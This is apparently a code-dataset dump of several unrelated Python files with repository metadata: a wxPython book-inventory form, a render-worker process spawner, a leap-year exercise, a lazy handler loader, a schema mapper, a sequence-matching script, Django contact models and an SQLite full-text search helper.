self.master_sizer.Add(self.toprow,0,wxEXPAND|wxALL,5) self.row2=wxBoxSizer(wxHORIZONTAL) self.static1=wxStaticText(self, -1, "Title:") self.description=wxTextCtrl(id=-1,name="merchandise_description", parent=self, style=0) self.row2.Add(self.static1,0,wxGROW,5) self.row2.Add(self.description,1,wxGROW,5) self.master_sizer.Add(self.row2,0, wxGROW,5) self.prices=multiplePrices(self) self.prices.addPage(page_name="list price",master=True) for m in cfg.get("multiple_prices"): self.prices.addPage(page_name=m[0],proportion_of_master=m[1]) self.prices.render() self.master_sizer.Add(self.prices.mp_sizer,1,wxEXPAND|wxALL, 5) self.row4=wxBoxSizer(wxHORIZONTAL) self.static3=wxStaticText(self, -1, "Publisher:") self.publisher=wxTextCtrl(id=-1,name="merchandise_publisher", parent=self, style=0) self.row4.Add(self.static3,0,wxEXPAND|wxALL,5) self.row4.Add(self.publisher,1,wxGROW) self.master_sizer.Add(self.row4, 0, wxGROW,5) self.row5 = wxBoxSizer(wxHORIZONTAL) self.static4=wxStaticText(self, -1, 
"Author:") self.moreAuthor = wxButton(self, -1, "More authors", (110, 500)) EVT_BUTTON(self, self.moreAuthor.GetId(), self.OnMoreAuthor) self.author=wxTextCtrl(id=-1,name="merchandise_author", parent=self, style=0) self.row5.Add(self.static4,0,wxEXPAND|wxALL,5) self.row5.Add(self.author,1,wxGROW,5,1) self.row5.Add(self.moreAuthor,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.row5, 0, wxGROW,5) self.row6 = wxBoxSizer(wxHORIZONTAL) self.static5=wxStaticText(self, -1, "Category:") self.category=wxTextCtrl(id=-1,name="merchandise_category", parent=self, style=0) self.row6.Add(self.static5,0,wxEXPAND|wxALL,5) self.row6.Add(self.category,1,wxGROW,5,1) self.master_sizer.Add(self.row6,0,wxGROW,5) self.row7 = wxBoxSizer(wxHORIZONTAL) self.static6=wxStaticText(self, -1, "Distributor:") self.distributor=wxTextCtrl(id=-1,name="merchandise_distributor", parent=self, style=0) self.row7.Add(self.static6,0,wxEXPAND|wxALL,5) self.row7.Add(self.distributor,1,wxGROW,5,1) self.master_sizer.Add(self.row7, 0, wxEXPAND|wxALL,5) self.static7=wxStaticText(self, -1, "Owner:") self.owner=wxTextCtrl(id=-1,name="merchandise_owner", parent=self, style=0) self.owner.SetValue(cfg.get("default_owner")) self.master_sizer.Add(self.static7,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.owner,0,wxEXPAND|wxALL,5) if self.statuses: self.static8=wxStaticText(self, -1, "Status:") self.status=wxRadioBox(id=-1,name="Radio box 1", parent=self, choices = self.statuses ) self.master_sizer.Add(self.static8,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.status,0,wxEXPAND|wxALL,5) kinds=["%s" % k.kindName for k in list(Kind.select())] self.static8=wxStaticText(self, -1, "Kind:") self.kind=wxChoice(id=-1,name="merchandise_kind", parent=self,choices=kinds,style=0) position = self.kind.FindString(self.selected_kind) self.kind.SetSelection(position) self.master_sizer.Add(self.static8,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.kind,0,wxEXPAND|wxALL,5) self.static9=wxStaticText(self, -1, "Notes:") self.notes=wxTextCtrl(id=-1,name="merchandise_notes", parent=self, style=0) self.master_sizer.Add(self.static9,0,wxEXPAND|wxALL,5) self.master_sizer.Add(self.notes,0,wxEXPAND|wxALL,5) self.b = wxButton(self, -1, "Add and continue", (15, 500)) EVT_BUTTON(self, self.b.GetId(), self.OnAddAndContinue) self.b2 = wxButton(self, -1, "Add and quit", (110, 500)) EVT_BUTTON(self, self.b2.GetId(), self.OnAddAndQuit) self.b3 = wxButton(self, -1, "Cancel", (110, 500)) EVT_BUTTON(self, self.b3.GetId(), self.OnCancel) self.bottomrow=wxBoxSizer(wxHORIZONTAL) self.bottomrow.Add(self.b,1,wxGROW, 5) self.bottomrow.Add(self.b2,1,wxGROW, 5) self.bottomrow.Add(self.b3,1,wxGROW, 5) self.master_sizer.Add(self.bottomrow,0,wxEXPAND|wxALL,5) self.statusBar = wxStatusBar(self, -1, name="statusBar") self.master_sizer.Add(self.statusBar,0,wxEXPAND|wxALL,5) self.number.SetFocus() self.Fit() self.SetSizer(self.master_sizer) self.SetAutoLayout(1) self.master_sizer.Fit(self) def OnKeyDown(self,event): keycode = event.GetKeyCode() if event.AltDown() == 1: print keycode if len(self.number.GetValue())==0: self.trailing_two=False self.keybuffer= "%s%s" % (self.keybuffer,keycode-48) if len(self.keybuffer) == 2 and econoscan: if len(self.number.GetValue())==12: if self.keybuffer=='05': self.number.SetValue(self.number.GetValue() + "%s" % (2)) self.trailing_two=True if len(self.keybuffer) == 3: keybuffer_as_int= int(self.keybuffer) - 48 if self.trailing_two: self.number.SetValue(self.number.GetValue()[:-1]) self.number.SetValue(self.number.GetValue() + "%s" % (keybuffer_as_int)) if 
econoscan and keybuffer_as_int==2: self.keybuffer="0" else: self.keybuffer="" else: event.Skip() def OnMoreAuthor(self, event): win = ChooseAuthorsPopup(self, self.OnGetAuthors) btn = event.GetEventObject() pos = btn.ClientToScreen( (0,0) ) sz = btn.GetSize() win.CenterOnScreen() win.ShowModal() win.Destroy() def OnGetAuthors(self, authors): authorstring=Author.get(authors.pop(0)).author_name.decode("string_escape") for author in authors: # we make a string ! authorstring = authorstring + "," + Author.get(author).author_name.decode("string_escape") self.author.SetValue(authorstring) def OnTextEnter(self,event): self.known_title=False id=self.number.GetValue() if (len(id) == 10 or len(id) == 13): item=self.parent.inventory.lookup_by_isbn(id) else: item=self.parent.inventory.lookup_by_upc(id) if item['known_title']: self.known_title=item['known_title'] if item['title']: self.number.SetEditable(False) self.description.SetValue(item['title']) self.prices.pages['list price'].price_ctrl.SetValue("%s" % (item['list_price'])) self.prices.update_pages(None) self.author.SetValue(item['authors_as_string']) self.category.SetValue(item['categories_as_string']) self.publisher.SetValue(item['publisher']) self.number.SetValue(item['isbn']) def OnText(self,event): id=self.number.GetValue() if len(id) == 13: self.OnTextEnter(event) def OnCancel(self,event): self.EndModal(1) def OnAddAndContinue(self,event): desc = self.description.GetValue() self.AddBook(event) self.statusBar.SetStatusText("%s added to book list" % desc) def OnAddAndQuit(self,event): if self.AddBook(event): self.OnCancel(event) def AddBook(self,event): description=self.description.GetValue() try: price_raw=self.prices.pages['list price'].price_ctrl.GetValue() price_corrected=string.replace(price_raw,"$","") price = float(price_corrected) except Exception,e: price=0 if len(description) > 0 and price > 0: #here we get values and add to inventory author_as_string=self.author.GetValue() authors=string.split(author_as_string,",") categories_as_string=self.category.GetValue() categories=string.split(categories_as_string,",") publisher=self.publisher.GetValue() distributor=self.distributor.GetValue() owner=self.owner.GetValue() notes=self.notes.GetValue() isbn=self.number.GetValue() quantity=self.quantity.GetValue() kind=self.kind.GetStringSelection() if self.statuses: status=self.status.GetSelection() writtenStatus = self.statuses[status] else: writtenStatus = "" extra_prices={} for m in cfg.get("multiple_prices"): mprice_raw=(self.prices.pages[m[0]]).price_ctrl.GetValue() mprice_corrected=string.replace(mprice_raw,"$","") mprice = float(mprice_corrected) print "mprice was %s" % mprice extra_prices[m[0]]=mprice self.parent.inventory.addToInventory(title=description,status=writtenStatus,authors=authors,publisher=publisher,price=price,isbn=isbn,categories=categories,distributor=distributor,quantity=quantity,known_title=self.known_title,kind_name=kind,extra_prices=extra_prices,owner=owner,notes=notes) self.quantity.SetValue("1") self.description.SetValue("") self.prices.pages['list price'].price_ctrl.SetValue("0.0$") self.author.SetValue("") self.notes.SetValue("") self.category.SetValue("") self.publisher.SetValue("") self.number.SetValue("") self.number.SetFocus() self.known_title=False self.number.SetEditable(True) return True; else: dlg = wxMessageDialog(self, "Fill in (at least) title and price correctly !", "Error", wxICON_ERROR|wxOK) dlg.ShowModal() return False;
UTF-8
Python
false
false
2,012
4,621,384,847,121
90d4ca0d03a1867bda149d0280ba821e747cb797
64013ee4edeea93417e1043096d81e4ac4aa9e82
/src/octopus/worker/process.py
9b47741417c4776ac2e3603ed5c609d759ac9c55
[ "BSD-3-Clause" ]
permissive
samson-jerome/OpenRenderManagement
https://github.com/samson-jerome/OpenRenderManagement
ca349deaf3228ecb8672beeb9de0a495e17476ac
e8f2b27d6b273f0c5b201999caaf0c39b67cbf3d
refs/heads/master
2021-01-22T06:32:47.697751
2014-11-21T18:55:12
2014-11-21T18:55:12
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' Used by Worker to spawn a new process. ''' __author__ = "Olivier Derpierre" __copyright__ = "Copyright 2009, Mikros Image" import logging import os import subprocess import resource from octopus.worker import settings LOGGER = logging.getLogger("main.process") CLOSE_FDS = (os.name != 'nt') def setlimits(): # the use of os.setsid is necessary to create a processgroup properly for the commandwatcher # it creates a new session in which the cmdwatcher is the leader of the new process group os.setsid() # set the limit of open files for ddd soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE) try: if settings.LIMIT_OPEN_FILES < hard: resource.setrlimit(resource.RLIMIT_NOFILE, (settings.LIMIT_OPEN_FILES, hard)) except Exception, e: LOGGER.error("Setting ressource limit failed: RLIMT_NOFILE [%r,%r] --> [%r,%r]" % (soft, hard, settings.LIMIT_OPEN_FILES, hard)) raise e def spawnCommandWatcher(pidfile, logfile, args, env): ''' logfile is a file object ''' devnull = file(os.devnull, "r") # normalize environment envN = os.environ.copy() for key in env: envN[str(key)] = str(env[key]) LOGGER.info("Starting subprocess, log: %r, args: %r" % (logfile, args)) try: # pid = subprocess.Popen(args, bufsize=-1, stdin=devnull, stdout=logfile, # stderr=subprocess.STDOUT, close_fds=CLOSE_FDS, # preexec_fn=setlimits, env=envN).pid process = subprocess.Popen( args, bufsize=-1, stdin=devnull, stdout=logfile, stderr=logfile, close_fds=CLOSE_FDS, preexec_fn=setlimits, env=envN) except Exception, e: LOGGER.error("Impossible to start subprocess: %r" % e) raise e file(pidfile, "w").write(str(process.pid)) return CommandWatcherProcess(process, pidfile, process.pid) class CommandWatcherProcess(object): def __init__(self, process, pidfile, pid): self.process = process self.pidfile = pidfile self.pid = pid def kill(self): '''Kill the process.''' if os.name != 'nt': from signal import SIGTERM from errno import ESRCH # PHASE 1 try: # do not kill the process, kill the whole process group! LOGGER.warning("Trying to kill process group %s" % str(self.pid)) os.killpg(self.pid, SIGTERM) return except OSError, e: LOGGER.error("A problem occured") # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise # PHASE 2 try: # the commandwatcher did not have time to setpgid yet, let's just kill the process # FIXME there still is room for a race condition there os.kill(self.pid, SIGTERM) except OSError, e: # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise # PHASE 3 try: # attempt to fix a race condition: # if we kill the watcher but the watcher had the time to # create processgroup and start another process in between # phases 1 and 2, then attempt to kill the processgroup. os.killpg(self.pid, SIGTERM) except OSError, e: # If the process is dead already, let it rest in peace. # Else, we have a problem, so reraise. if e.args[0] != ESRCH: raise else: os.popen("taskkill /PID %d" % self.pid)
UTF-8
Python
false
false
2,014
7,078,106,134,197
94ab2f3139e3ffa199f0f2f9b40b98b273cb64c4
98c6ea9c884152e8340605a706efefbea6170be5
/examples/data/Assignment_2/ndxyen001/question1.py
a783e1790bd3b72d9cafeb4021d52e64ef8d368d
[]
no_license
MrHamdulay/csc3-capstone
https://github.com/MrHamdulay/csc3-capstone
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
refs/heads/master
2021-03-12T21:55:57.781339
2014-09-22T02:22:22
2014-09-22T02:22:22
22,372,174
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Yentl Naidu (NDXYEN001)
# 14 March 2014
# Assignment 2

year = eval(input("Enter a year: \n"))

if (year % 400 == 0):
    print(str(year), "is a leap year.")
elif (year % 4 == 0 and year % 100 > 0):
    print(str(year), "is a leap year.")
else:
    print(str(year), "is not a leap year.")
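For reference, the same Gregorian rule written as a single boolean expression (illustration only, not part of the assignment):

def is_leap(year):
    return year % 400 == 0 or (year % 4 == 0 and year % 100 != 0)

assert is_leap(2000) and is_leap(2012) and not is_leap(1900)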
UTF-8
Python
false
false
2,014
14,250,701,532,935
584d61b0847c65baca43054c5189a65d7b5100d3
cbc956d5e325f882124c58e0cd1893edec2ddcb4
/lib/LazyControllerLoader.py
6772476ce9e6d0ccd9aa6ff549025a994fd2318c
[]
no_license
dound/CraigNotes
https://github.com/dound/CraigNotes
1e90581b5aa5e5e31f7d21845bbbbda37ddd347c
40aeb38397041d042b7497c6090d75a03d751dd6
refs/heads/master
2021-01-01T05:38:06.487865
2011-04-21T05:30:20
2011-04-21T05:30:20
1,643,929
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
def _istring(import_name):
    """Imports an object based on a string.

    @param import_name the dotted name for the object to import.
    @return imported object
    """
    module, obj = import_name.rsplit('.', 1)
    # __import__ can't handle unicode strings in fromlist if module is a package
    if isinstance(obj, unicode):
        obj = obj.encode('utf-8')
    return getattr(__import__(module, None, None, [obj]), obj)


class _lazy(object):
    """Handles lazily importing and instantiating a class."""

    def __init__(self, path):
        """Specify the path to the class to lazily import and instantiate."""
        self.path = path
        self.name = path.split(".")[-1]
        self.cls = None

    def __call__(self):
        """Import the specified class and return a new instantiation of it."""
        if not self.cls:
            self.cls = _istring(self.path)
        return self.cls()


def url_list(mappings):
    """Creates a webapp-compatible list of URL mappings from mappings from
    URL patterns (like the default) -> string containing the path to the
    request handler object.

    The values in the returned list are wrappers around the handler objects
    which only perform the import of the handler when actually called.
    """
    return [(m[0], _lazy(m[1])) for m in mappings]
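A hypothetical use with Google App Engine's webapp framework, which is what the "webapp-compatible" docstring suggests; the handler dotted paths are invented.

from google.appengine.ext import webapp

# Handlers are imported lazily, only when a matching request first arrives.
application = webapp.WSGIApplication(
    url_list([
        (r'/',        'handlers.MainPage'),
        (r'/feed/.*', 'handlers.FeedHandler'),
    ]),
    debug=True)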
UTF-8
Python
false
false
2,011
16,630,113,408,874
8604c2419b4055e5beabaafbdcfbaf292d476d3f
c29892f808bd0f2bb19efea2a73f4ac42e9ee9f0
/src/tkacz/mapper/__init__.py
61428a0b9258d304df2aae6462372b265a55ea79
[ "AGPL-3.0-or-later", "AGPL-3.0-only" ]
non_permissive
thblt/tkacz-deprecated-first-attempt
https://github.com/thblt/tkacz-deprecated-first-attempt
6e55199c9675672b5997e448ea8ca8c2105404a1
c4a793074504aca74485baa75dd0d0ad41aae060
refs/heads/master
2015-08-03T18:55:16.642455
2013-11-01T19:22:13
2013-11-01T19:22:13
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/Library/Frameworks/Python.framework/Versions/3.3/bin/python3.3 import copy """ Defines the abstract types, objects and extensions used by Tkacz. This is the very basic API for a schema. """ class TZAbstractDatum( object ): tzType = property( lambda self: self.__class__.__module__ + '.' + self.__class__.__name__ ) def set( self, value ): raise Exception( "Direct input unavailable for {0}".format( self.tzType ) ) ########################################################################################## # Primitives # ########################################################################################## class TZPrimitive( TZAbstractDatum ): ''' A TZPrimitive is a single piece of data. Types are made of primitives or other Types. Primitives are only used in Types. Cards can't be Primitives only. The standard definition of a Primitive is a) it has no member data and b) it (should) serializes to a string instead of a dict. ''' def set( self, value ): self._value = self.decode( value ) value = property( lambda self: self._value, set ) def __init__(self): self._value = None self.__tzDict__ = dict() def __repr__(self): return (str(self._value)) def serialize (self): return self._value class TZString( TZPrimitive ): """ A String """ def decode( self, value ): return str( value ) class TZBoolean( TZPrimitive ): def decode( self, value ): return bool( value ) def __init__( self, default=False ): super(TZBoolean, self).__init__() self.default = property( default ) class TZInteger( TZPrimitive ): def decode( self, value ): return int( value ) class TZFloat( TZPrimitive ): def decode( self, value ): return float( value ) class TZList( TZPrimitive ): pass class TZSet( TZPrimitive ): pass class TZOneOf( TZPrimitive ): def __init__( self, values ): super(TZOneOf, self).__init__() self.amongst = values def decode(self, val): if val in self.amongst: self._value = val else: raise Exception("Illegal input.") class TZSomeOf( TZPrimitive ): def __init__( self, values ): self.values = property( values ) ########################################################################################## # Types # ########################################################################################## class TZType( TZAbstractDatum ): ''' A Type is a the description of a meaningful set of other types and primitives. It can be represented by a Python dict. Warning, there's some black magic here. TZTypes are meant to be easy to create, and making a new type is as simple as adding fields such as: something = TZString() to a new class inheriting TZTypes. When instantiating the object, it creates an internal dictionary (at instance level) to hold the effective values, and uses ''' def __setattr__(self, name, val): target = getattr(self, name) if isinstance(target, TZAbstractDatum): return target.set(val) else: target = val def serialize(self): out = dict() for name, val in self.__dict__.items(): out[name] = val.serialize() return out def __init__( self ): # Copy class objects into instance objects. 
for name, value in self.__class__.__dict__.items(): if isinstance( value, TZAbstractDatum ): object.__setattr__(self, name, copy.copy(value)) class TZDocument( TZType ): __tzCollection__ = 'cards' __tzDocId = 14 def serialize(self, atRoot = False): if atRoot: out = super(TZDocument, self).serialize() else: out = { '_link': True } out['_type'] = self.tzType out['_id'] = self.__tzDocId return out ########################################################################################## # Tests # ########################################################################################## class TZTest( object ): pass class IfEquals( TZTest ): def __init__( self, prop, value ): self._property = prop self._value = value def evaluate( self, target ): return target.findProperty( self._property ).equals( self._value )
UTF-8
Python
false
false
2,013
3,418,794,019,262
801e63657bb43e6cdf7a5121c2b8a054445785ec
7f20b1bddf9f48108a43a9922433b141fac66a6d
/csplugins/trunk/ucsd/rsaito/rs_Progs/rs_Python/rs_Python_Pack/tags/rs_Python_Pack080114/IVV_Packages/IVV_Info/IVV_RefSeq_match2.py
95587203f3a02df338fef671efdfd603a8ce90d4
[]
no_license
ahdahddl/cytoscape
https://github.com/ahdahddl/cytoscape
bf783d44cddda313a5b3563ea746b07f38173022
a3df8f63dba4ec49942027c91ecac6efa920c195
refs/heads/master
2020-06-26T16:48:19.791722
2013-08-28T04:08:31
2013-08-28T04:08:31
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import sys import string import os from IVV_Packages.IVV_Info.IVV_info1 import IVV_info from IVV_Packages.IVV_Info.IVV_filter1 import IVV_filter from Seq_Packages.Seq.MultiFasta2 import MultiFasta from Seq_Packages.Seq.Fasta_align_pack2 import Ssearch from Seq_Packages.Homology.Homology_descr4 import HomologyDescr from Seq_Packages.Homology.Homology_term1 import * from General_Packages.Data_Struct.MultiDimDict1 import MultiDimDict class IVV_RefSeq_match: def set_db(self, ivv_info, ivvseqdb, refseqdb): self.ivv_info = ivv_info self.ivvseqdb = ivvseqdb self.refseqdb = refseqdb self.ivvseq = MultiFasta(self.ivvseqdb) self.refseq = MultiFasta(self.refseqdb) self.refseq_version = {} self.refseqid_valid = MultiDimDict(1, 0) def set_fastacmd_path(self, path): """ You can use this method only after setting self.ivvseq """ self.ivvseq.set_fastacmd_EXEC(path) def set_fastaexec_path(self, path): self.fastaexec_path = path def set_match_result_file(self, filename): self.match_result_file = filename def match_all(self): prey_info = self.ivv_info.Prey_info() fh = open(self.match_result_file, "w") fh.write(string.join(( t_query_ID, t_subject_ID, t_e_value, t_identity_abs, t_positive_abs, t_overlap, t_query_len, t_subject_len, t_query_start, t_query_end, t_subject_start, t_subject_end), "\t") + "\n") count = 0 for ivvseqid in prey_info.preys(): refseqid = prey_info.get_qual_noerror(ivvseqid, "hit_refseqid") if not refseqid: continue refseqid, version = refseqid.split(".") self.refseq_version[ refseqid ] = version ss = self.fasta_match(ivvseqid, refseqid) if ss != False: fh.write(string.join(( ivvseqid, refseqid, `ss.eval()`, `int(ss.ident() * ss.overlp())`, # Correct ? `int(ss.similar() * ss.overlp())`, # Correct ? `ss.overlp()`, `ss.q_len()`, `ss.s_len()`, `ss.q_start()`, `ss.q_end()`, `ss.s_start()`, `ss.s_end()`), "\t") + "\n") self.refseqid_valid.plus_val((refseqid,), 1) count += 1 if count % 1000 == 0: sys.stderr.write("Processed " + `count` + " sequences.\n") sys.stderr.write("Processed " + `count` + " sequences.\n") fh.close() def load_match(self, match_result_file): self.match = HomologyDescr(match_result_file) return self.match def fasta_match(self, ivvseqid, refseqid): ivvseq_single = self.ivvseq.get_singlefasta(ivvseqid) refseq_single = self.refseq.get_singlefasta(refseqid) if refseq_single is None: return False else: ss = Ssearch() ss.set_fasta_obj(ivvseq_single, refseq_single) ss.exec_fasta() ss.parse_result() ret = ss return ret def output_related_refseqids(self, filename): refseqids = self.refseqid_valid.get_all_data().keys() refseqid_to_geneid = {} refseqid_to_symbol = {} prey_info = self.ivv_info.Prey_info() for ivvseqid in prey_info.preys(): refseqid = prey_info.get_qual_noerror(ivvseqid, "hit_refseqid") if not refseqid: continue refseqid = refseqid.split(".")[0] geneid = prey_info.geneid(ivvseqid) symbol = prey_info.genesymbol(ivvseqid) refseqid_to_geneid[ refseqid ] = geneid refseqid_to_symbol[ refseqid ] = symbol fh = open(filename, "w") for refseqid in refseqids: refseq = MultiFasta(self.refseqdb) seqobj = refseq.get_singlefasta(refseqid) seqobj.set_ID("lcl|" + refseqid + " " + refseqid_to_geneid[ refseqid ] + " " + refseqid_to_symbol[ refseqid ] + " " + "(" + refseqid + "." 
+ self.refseq_version[refseqid] + ")") fh.write(seqobj.get_singleseq().return_fasta(60) + "\n") fh.close() if __name__ == "__main__": from General_Packages.Usefuls.rsConfig import RSC_II rsc = RSC_II("rsIVV_Config") filter = IVV_filter() filter.set_Prey_filter_file(rsc.PreyFilter) sys.stderr.write("Reading IVV information ...\n") ivv_info = IVV_info(rsc.IVVInfo, filter) ivm = IVV_RefSeq_match() ivm.set_db(ivv_info, rsc.IVVSeq, rsc.RefSeq_RNA_Human) """ This part should be used to calculate relationship between IVV and RefSeq ivm.set_match_result_file(rsc.HomolIVVRefSeq_Ssearch) ivm.match_all() ivm.output_related_refseqids(rsc.IVVRefSeq_MatchSeq) """ homol = ivm.load_match(rsc.HomolIVVRefSeq_Ssearch) query = "T060407_H07_K03.seq" subject = "NM_004082" ss = ivm.fasta_match(query, subject) print ss.q_start(), "-", ss.q_end() print ss.s_start(), "-", ss.s_end() print homol.query_start(query, subject), homol.query_end(query, subject) print homol.subject_start(query, subject), homol.subject_end(query, subject)
UTF-8
Python
false
false
2,013
5,068,061,439,490
cfe348c0c4621fa251ec65b71789cd20b8068633
e4712c4828b2970fa042af9b1c95dc82dbb8cb0d
/doc/django/model-files/contact/models.py
ca00e0e9aaa3a553c20e4a74d33598059fc1beb0
[]
no_license
Mark-Seaman/50-Tricks
https://github.com/Mark-Seaman/50-Tricks
3becf8d43b4db4b9f2032c45e5ce0464d9472a9e
bbf9009eb37f82517128557dc9a44afe470ed450
refs/heads/master
2016-08-05T05:28:17.655817
2014-07-14T15:03:39
2014-07-14T15:03:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# models.py
# Demonstrate many to many relationships

from django.db import models
from contact import Contact
from company import Company

#-----------------------------------------------------------------------------
# Usage of models

def clear():
    Contact.objects.all().delete()
    Company.objects.all().delete()

def print_contact(contact):
    for x in contact.table():
        print ' %-10s: %s' % (x[0], x[1])
    if len(contact.company_set.all()) > 0:
        print ' %-10s: ' % 'companies',
        print ', '.join([c.name for c in contact.company_set.all()])
    print

def print_company(company):
    for x in company.table():
        print ' %-10s: %s' % (x[0], x[1])
    if len(company.contacts.all()) > 0:
        print ' %-10s: ' % 'contacts',
        print ', '.join([c.name for c in company.contacts.all()])
    print

def print_all_companies():
    contacts = Contact.objects.all()
    print ('-' * 77)
    print "Contacts: %d records found" % len(contacts)
    for c in contacts:
        print_contact(c)

def print__all_contacts():
    companies = Company.objects.all()
    print ('-' * 77)
    print 'Companies: %d records found' % len(companies)
    for c in companies:
        print_company(c)

def get_contact(name):
    contacts = Contact.objects.filter(name=name)
    if len(contacts) < 1:
        return Contact()
    else:
        return contacts[0]

def get_company(name):
    c = Company.objects.filter(name=name)
    if len(c) < 1:
        return Company()
    else:
        return c[0]

def add_fake_contact(name):
    c = get_contact(name)
    c.name = name
    c.address = 'Here'
    c.phone = '900-555-1212'
    c.save()
    return c

def add_fake_company(name):
    c = get_company(name)
    c.name = name
    c.address = 'There you are'
    c.phone = '303-555-1212'
    c.save()
    return c

def assign(contact, company):
    add_fake_contact(contact)
    add_fake_company(company)
    get_company(company).contacts.add(get_contact(contact))

def test_code():
    #clear()
    assign('Don', 'Impact Group')
    assign('Brad', 'Impact Group')
    assign('Eric', 'Impact Group')
    assign('Mark', 'Impact Group')
    assign('Ron', 'App Thumper')
    assign('Steph', 'App Thumper')
    assign('Mark', 'App Thumper')
    assign('Mark', 'Shrinking World Solutions')
    assign('Eric', 'Shrinking World Solutions')
    print_all_companies()
    print__all_contacts()
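Contact and Company are imported from sibling modules and are not shown in this file. A hypothetical sketch of what the demo above assumes they look like: the field names and the contacts many-to-many relation are inferred from the usage, the table() helper returns the (label, value) pairs consumed by print_contact/print_company, and the field types and lengths are guesses:

from django.db import models

class Contact(models.Model):
    name = models.CharField(max_length=100)
    address = models.CharField(max_length=200)
    phone = models.CharField(max_length=20)

    def table(self):
        return [('name', self.name), ('address', self.address), ('phone', self.phone)]

class Company(models.Model):
    name = models.CharField(max_length=100)
    address = models.CharField(max_length=200)
    phone = models.CharField(max_length=20)
    contacts = models.ManyToManyField(Contact)   # gives Contact the reverse accessor company_set

    def table(self):
        return [('name', self.name), ('address', self.address), ('phone', self.phone)]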
UTF-8
Python
false
false
2,014
4,320,737,131,117
b003e456948e697cca8e45b262a67eeee654b9c0
427eeba8363d795ff8102935c1a1723fdc57fd10
/src/fts.py
fa987cba05e8d4e34661382dac85d75ad40155d3
[]
no_license
fractaledmind/alfred-index-demo
https://github.com/fractaledmind/alfred-index-demo
b0d819dbda2cdfe8632de0e2ea756526895076da
387b59fdf7d38af4f55a763b01304c043638c02f
refs/heads/master
2021-01-22T16:25:48.874904
2014-12-27T07:41:37
2014-12-27T07:41:37
28,462,793
2
1
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python # encoding: utf-8 from __future__ import print_function, unicode_literals import sqlite3 import struct from os import path class FTSDatabase(object): def __init__(self, data, file=None): self.data = data self._file = file or ':memory:' self._table = 'filter' self._fields = 'id, data' self._tokenizer = 'simple' self.con = sqlite3.connect(self._file) # Properties ------------------------------------------------------------- @property def file(self): return self._file @file.setter def file(self, value): self._file = value @property def table(self): return self._table @table.setter def table(self, value): self._table = value @property def fields(self): return self._fields @fields.setter def fields(self, value): self._fields = value @property def tokenizer(self): return self._tokenizer @tokenizer.setter def tokenizer(self, value): self._tokenizer = value # API -------------------------------------------------------------------- def create(self, table=None, fields=None, tokenizer=None): # Allow for dynamic table and field names self.table = table or self._table self.fields = fields or self._fields self.tokenizer = tokenizer or self._tokenizer with self.con: cur = self.con.cursor() # Create virtual table if new database if not path.exists(self.file) or path.getsize(self.file) == 0: print('creating...') sql = ('CREATE VIRTUAL TABLE {table} ' 'USING fts3({columns}, tokenize={tokenizer})') sql = sql.format(table=self.table, columns=self.fields, tokenizer=self.tokenizer) self._execute(cur, sql) # Fill and index virtual table sql = None for i, item in enumerate(self.data): values = self._prepare_values(i, item) if not sql: sql = ('INSERT OR IGNORE INTO {table} ' '({columns}) VALUES ({data})') sql = sql.format(table=self.table, columns=self.fields, data=', '.join('?' * len(values))) cur.execute(sql, values) def search(self, query, ranks=None): # If user runs `search` first, bootstrap database # with default `table`, `fields`, and `tokenizer`. self.create() # nested SELECT to keep from calling the rank function # multiple times per row. sql = ('SELECT * FROM ' '(SELECT rank(matchinfo({table})) ' 'AS score, {columns} ' 'FROM {table} ' 'WHERE {table} MATCH ?) ' 'ORDER BY score DESC;').format(table=self.table, columns=self.fields) # `sqlite3.Row` provides both index-based and # case-insensitive name-based access to columns # with almost no memory overhead self.con.row_factory = sqlite3.Row with self.con: cur = self.con.cursor() ranks = ranks or [1.0] * len(self.fields) self.con.create_function('rank', 1, self.make_rank_func(ranks)) cur.execute(sql, (query,)) return cur.fetchall() ## Helper Methods -------------------------------------------------------- def _execute(self, cur, sql): try: cur.execute(sql) except sqlite3.OperationalError as err: exists_error = b'table {} already exists'.format(self.table) if err.message == exists_error: pass elif b'malformed MATCH' in err.message: return 'Invalid query' else: raise err def _prepare_values(self, i, item): values = [i, item] if hasattr(item, '__iter__'): values = [self._quote(self._unquote(x)) for x in item] return values @staticmethod def _quote(text): return '"' + text + '"' @staticmethod def _unquote(text): return text.replace('"', "'") @staticmethod def make_rank_func(weights): """Search ranking function. Use floats (1.0 not 1) for more accurate results. Use 0 to ignore a column. Adapted from <http://goo.gl/4QXj25> and <http://goo.gl/fWg25i> :param weights: list or tuple of the relative ranking per column. 
:type weights: :class:`tuple` OR :class:`list` :returns: a function to rank SQLITE FTS results :rtype: :class:`function` """ def rank(matchinfo): """ `matchinfo` is defined as returning 32-bit unsigned integers in machine byte order (see http://www.sqlite.org/fts3.html#matchinfo) and `struct` defaults to machine byte order. """ bufsize = len(matchinfo) # Length in bytes. matchinfo = [struct.unpack(b'I', matchinfo[i:i + 4])[0] for i in range(0, bufsize, 4)] it = iter(matchinfo[2:]) return sum(x[0] * w / x[1] for x, w in zip(zip(it, it, it), weights) if x[1]) return rank
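A hypothetical usage sketch of the FTSDatabase class above; the sample rows and query are illustrative, and the defaults (in-memory SQLite, table 'filter', columns 'id, data') are the ones set in __init__:

data = ['lorem ipsum', 'dolor sit amet', 'ipsum dolor sit']
db = FTSDatabase(data)            # defaults to an in-memory SQLite database
for row in db.search('ipsum'):    # search() bootstraps the fts3 table on first use
    print('{0}\t{1}'.format(row['score'], row['data']))   # rows ordered by descending rank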
UTF-8
Python
false
false
2,014
128,849,061,578
3bc5abb32020bab9f6fb1efa9a7d39de057c2563
c86fcaba53e8c776c6d5e2c05b9a16d851080fa5
/main.py
abd28172ca892451cfddbb5e9a0e197805f021a4
[]
no_license
ramonesteban/research
https://github.com/ramonesteban/research
